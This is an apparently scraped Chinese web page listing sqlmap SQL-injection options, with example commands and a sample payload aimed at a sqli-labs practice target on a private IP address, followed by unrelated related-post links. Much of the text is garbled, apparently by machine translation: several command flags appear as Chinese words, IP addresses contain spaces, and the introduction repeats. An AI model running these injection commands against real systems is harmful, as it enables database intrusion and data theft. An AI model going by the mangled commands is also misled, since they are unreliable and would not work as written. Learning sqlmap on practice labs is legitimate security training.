如何解析sqlmap注入参数

技术如何解析sqlmap注入参数这篇文章将为大家详细讲解有关如何解析sqlmap注入参数,文章内容质量较高,因此小编分享给大家做个参考,希望大家阅读完这篇文章后对相关知识有一定的了解。一、指定数据库类型 --dbmsht

本文将详细说明如何分析sqlmap的注入参数。这篇文章的内容质量很高,所以边肖会分享给大家参考。希望你看完这篇文章后有所了解。

首先,指定数据库类型- dbms

http://192 . 168 . 1 . 121/sqli/Less-1/?id=1name=2 - dbms mysql - dbs

其次,指定操作系统

http://192 . 168 . 1 . 121/sqli/Less-1/?id=1name=2 - os windows - dbs

第三,解决编码问题

将所有结果转换为字符串,并用空格替换空结果。

第四,关闭串逸机制。

-不-逃跑

动词(verb的缩写)设置无效的值替换

-无效-bignum大整数替换

-无效-逻辑布尔运算替换

-无效字符串-随机字符串替换

不及物动词自定义进样位置

-前缀设置前缀

-后缀集后缀

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' -前缀='')' -后缀='和'(abc'='abc' - dbs

payload:id=('1 ')和(' abc'='abc ')

七.设置篡改脚本

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' -最少篡改. py,清漆. py' - dbs

八.设置dbms身份验证

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1 '-DBMS-cred=' root : root '-DBS

九.设置特定的sql注入技术

B技术布尔盲

技术误差注入

-U技术联合查询注入

-技术堆栈注入

时间盲测试技术

-Q技术内联查询注入

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' -技术测试时间-秒-3-DBS

-时间-秒时间盲测时间是3。

X.指定联合字段的数量

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' - union-cols 12-18 - dbs

十一、指定并集字符,默认为空。

sqlmap-u ' http://192 . 168 . 1 . 121/sqli/Less-1/?id=1' - union-char aaa - dbs

如何解析sqlmap注入参数,希望在这里分享。

内容来源网络,如有侵权,联系删除,本文地址:https://www.230890.com/zhan/140994.html

(0)

相关推荐

  • 蛋糕简笔画图片大全,自制蛋糕的做法大全谁有

    技术蛋糕简笔画图片大全,自制蛋糕的做法大全谁有家庭自制蛋糕 工具:电饭锅一个 材料:鸡蛋四个、面粉一饭勺、苏打粉(酵母粉)一小勺、生粉两小勺、色拉油、白砂糖、葡萄干若干 制作:先将鸡蛋打散在一个容器里,边搅拌边加入白砂糖

    生活 2021年10月28日
  • Python编码的技巧有哪些

    技术Python编码的技巧有哪些这篇文章主要介绍“Python编码的技巧有哪些”,在日常操作中,相信很多人在Python编码的技巧有哪些问题上存在疑惑,小编查阅了各式资料,整理出简单好用的操作方法,希望对大家解答”Pyt

    攻略 2021年11月26日
  • MYSQL如何配置远程连接

    技术MYSQL如何配置远程连接这篇文章主要介绍MYSQL如何配置远程连接,文中介绍的非常详细,具有一定的参考价值,感兴趣的小伙伴们一定要看完!开启 MySQL 的远程登陆帐号有两大步:1、确定服务器上的防火墙没有阻止 3

    攻略 2021年11月1日
  • 有理数100道带答案过程,求100道有理数混合计算,七上)

    技术有理数100道带答案过程,求100道有理数混合计算,七上)-2/9-7/9-56 4。6-(-3/4 1。6-4-3/4) 1/2 3 5/6-7/12 [2/3-4-1/4 (-0。4)]/1/3 2 22 (-4

    生活 2021年10月23日
  • 光猫是什么样子的,怎么看光猫是千兆还是百兆

    技术光猫是什么样子的,怎么看光猫是千兆还是百兆看光猫是千兆还是百兆有这么两种方法,一种看光猫网络接口旁边的标记光猫是什么样子的;一种是查看光猫说明书。下面分开来讲一下。1、光猫网络接口类型光猫也叫光调制解调器、光纤猫等,

    生活 2021年10月26日
  • apache spark处理安全日志(apache远程执行漏洞)

    技术Apache Spark远程代码执行漏洞怎么解决本篇内容介绍了“Apache Spark远程代码执行漏洞怎么解决”的有关知识,在实际案例的操作过程中,不少人都会遇到这样的困境,接下来就让小编带领大家学习一下如何处理这

    攻略 2021年12月16日